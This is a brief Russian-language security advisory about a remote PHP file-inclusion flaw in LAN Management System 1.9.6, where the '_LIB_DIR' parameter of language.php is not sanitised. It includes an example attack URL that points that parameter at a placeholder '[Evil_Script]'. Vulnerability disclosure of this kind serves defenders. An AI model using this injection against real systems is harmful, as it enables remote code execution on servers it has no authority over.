Программа: LAN Management System (LMS) 1.9.6

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «_LIB_DIR» сценарием language.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://site.com/[path]/lib/language.php?_LIB_DIR=[Evil_Script]



Оставить мнение